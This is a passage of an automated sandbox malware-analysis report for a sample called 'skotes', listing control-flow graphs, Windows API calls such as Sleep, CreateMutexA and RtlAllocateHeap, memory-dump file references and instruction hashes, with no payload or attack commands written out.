                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 844cbc539c1cd2cd5f359991db56e410060f8aac3bfab7393fb5ac8797e750d2
                                                                                                                                                                                                                                                  • Instruction ID: 32f1c1cad3ebeed7af6ea12e1b97109ecbe5e6fe271f4729657f8ce5c9ae35e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 844cbc539c1cd2cd5f359991db56e410060f8aac3bfab7393fb5ac8797e750d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA212871B052019BEB18AB68EC8DBADB762EBC5310F20861FE41C973D1D77D99508B1A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 306 47a856-47a86e 307 47a870-47a87c 306->307 308 47a89c-47a89e 306->308 309 47a892-47a899 call 48d663 307->309 310 47a87e-47a88c 307->310 311 47a8a0-47a8a7 308->311 312 47a8a9-47a8b1 call 477d30 308->312 309->308 310->309 315 47a94e-47a987 call 4a6c6a Sleep CreateMutexA 310->315 313 47a8eb-47a916 call 4880c0 311->313 322 47a8e4-47a8e6 312->322 323 47a8b3-47a8bb call 477d30 312->323 327 47a98e-47a994 315->327 322->313 323->322 328 47a8bd-47a8c5 call 477d30 323->328 329 47a9a7-47a9a8 327->329 330 47a996-47a998 327->330 328->322 334 47a8c7-47a8cf call 477d30 328->334 330->329 332 47a99a-47a9a5 330->332 332->329 334->322 338 47a8d1-47a8d9 call 477d30 334->338 338->322 341 47a8db-47a8e2 338->341 341->313
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 0b4ba8b73e6065c6ab4cb87b3eda228eb216c1a32cfce3e6349492311bee48a6
                                                                                                                                                                                                                                                  • Instruction ID: 66518395767d0fec7a92440fc126681aab31c9c0d99db54d9e3f63fbff35f130
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4ba8b73e6065c6ab4cb87b3eda228eb216c1a32cfce3e6349492311bee48a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04213870649201CAEB287779988ABAEB3529FC1304F25881FE14C963C2CB7E4851825F

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 283 47a34f-47a35b 284 47a371-47a39a call 48d663 283->284 285 47a35d-47a36b 283->285 291 47a39c-47a3a8 284->291 292 47a3c8-47a916 call 4880c0 284->292 285->284 286 47a93a 285->286 289 47a953-47a994 Sleep CreateMutexA 286->289 290 47a93a call 4a6c6a 286->290 298 47a9a7-47a9a8 289->298 299 47a996-47a998 289->299 290->289 293 47a3be-47a3c5 call 48d663 291->293 294 47a3aa-47a3b8 291->294 293->292 294->286 294->293 299->298 303 47a99a-47a9a5 299->303 303->298
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: dcfefdc37c410e699c1a3adfb3a5e90734e5a8aa54f55baa6f2ed672e97b1979
                                                                                                                                                                                                                                                  • Instruction ID: fbae6c50dd06feb00a48de2ecd221e27f9b188c9bf008e9e7c02e148f4447656
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcfefdc37c410e699c1a3adfb3a5e90734e5a8aa54f55baa6f2ed672e97b1979
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25216A717042019BEB189F28EC897ADB762DBD6311F248A1FE40C977D1C77E95A0871A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 342 4ad82f-4ad83a 343 4ad848-4ad84e 342->343 344 4ad83c-4ad846 342->344 346 4ad850-4ad851 343->346 347 4ad867-4ad878 RtlAllocateHeap 343->347 344->343 345 4ad87c-4ad887 call 4a75f6 344->345 352 4ad889-4ad88b 345->352 346->347 348 4ad87a 347->348 349 4ad853-4ad85a call 4a9dc0 347->349 348->352 349->345 355 4ad85c-4ad865 call 4a8e36 349->355 355->345 355->347
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004AA813,00000001,00000364,00000006,000000FF,?,004AEE3F,?,00000004,00000000,?,?), ref: 004AD870
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 6ada836cd9fc5f3533901b89ca663c5a820016bbfc112b88dc6696245590a2e7
                                                                                                                                                                                                                                                  • Instruction ID: 392a6dd2fa84db1492ebcb90e419adc8ab7475ef940ac0a7c7114287860a944c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ada836cd9fc5f3533901b89ca663c5a820016bbfc112b88dc6696245590a2e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F0E972E4512466EB213A739C01A5B3759DF737B0B15802FEC2AA7A91DA2CEC0181E9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
